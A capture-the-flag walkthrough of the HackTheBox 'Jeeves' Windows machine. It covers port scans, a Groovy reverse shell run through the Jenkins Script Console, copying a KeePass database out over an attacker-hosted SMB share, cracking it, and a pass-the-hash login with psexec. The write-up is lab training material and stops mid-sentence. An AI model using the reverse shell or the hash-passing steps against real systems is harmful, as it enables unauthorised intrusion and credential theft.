Jeeves | HackTheBox

Tue, 02 Jun 2026 15:23:34 +0530

Overview

Title	Jeeves
Difficulty	Medium
Machine	Windows
Maker

About Jeeves

Information Gathering

Scanned all TCP ports:

sudo nmap -p- --min-rate 10000 -vv $IP -oA recon/nmap/ports

Nmap scan report for 10.129.228.112
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2026-05-29 19:08:48 IST for 14s
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
50000/tcp open ibm-db2 syn-ack ttl 127

Enumerated open TCP ports:

nmap -p80,135,445,50000 -sC -sV --min-rate 10000 -vv -oA recon/nmap/service $IP

Nmap scan report for 10.129.228.112
Host is up, received syn-ack (0.16s latency).
Scanned at 2026-05-29 19:10:58 IST for 49s

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Ask Jeeves
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 5h02m56s, deviation: 0s, median: 5h02m55s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 58009/tcp): CLEAN (Timeout)
| Check 2 (port 44360/tcp): CLEAN (Timeout)
| Check 3 (port 39602/udp): CLEAN (Timeout)
| Check 4 (port 26708/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2026-05-29T18:44:03
|_ start_date: 2026-05-29T18:40:11

Enumeration

Port 80 - HTTP (IIS/10.0)

Port 50000 - HTTP (Jetty 9.4)

Fuzzing on this server showed the path /askjeeves

feroxbuster -u http://10.129.228.112:50000/ --no-recursion -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt

It’s hosting a Jenkins server.

Exploitation

Jenkins Script Console RCE

In jenkins we can execute groovy script on the host machine using the Script Console feature.

This is the reverse shell I used

String host="IP";int port=port;String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Start a netcat listener and run this script to get shell access:

Privilege Escalation

Local Enumeration

There’s a keepass database located in the user’s Documents directory.

For file transfer we have to setup an smb server since there are no executables like certutils, wget, curl, nc, etc. available in the machine.

We can use impacket’s smbserver.py script for this:

sudo smbserver.py share . -ip 10.10.14.63

Then from inside the box, mount the share to a drive and just copy the file to the drive:

net use s: \\10.10.14.63\share

copy CEH.kdbx s:

Now it’s in our machine.

Conver kdbx to hash using keepass2john

keepass2john CEH.kdbx > kdbxhash

Now let’s find the password:

We are able to open the database using the password:

NTLM hash of a user is stored in Backup stuff

There was also a cleartext password of administrator:

But this was not working:

There are only two users in this machine:

So let’s try to use the hash with Administrator:

And it worked.

Privilege Escalation as Administrator

We can use psexec.py to get shell access as admin using the hash alone.

In Desktop there’s an hm.txt file:

Which just shows

Alternate Data Stream (ADS)

In NTFS file systems there’s something called an Alternate Data Stream. This feature let a file carry multiple named hidden streams of data. By default these additional data streams are not listed in explorer. We can list this using the /r flag in the dir command.

There are multiple ways to read the actual root.txt file. We can powershell’s Get-Content function to specify the stream we want to read:

powershell Get-Content -path hm.txt -Stream root.txt -Raw

Psexec on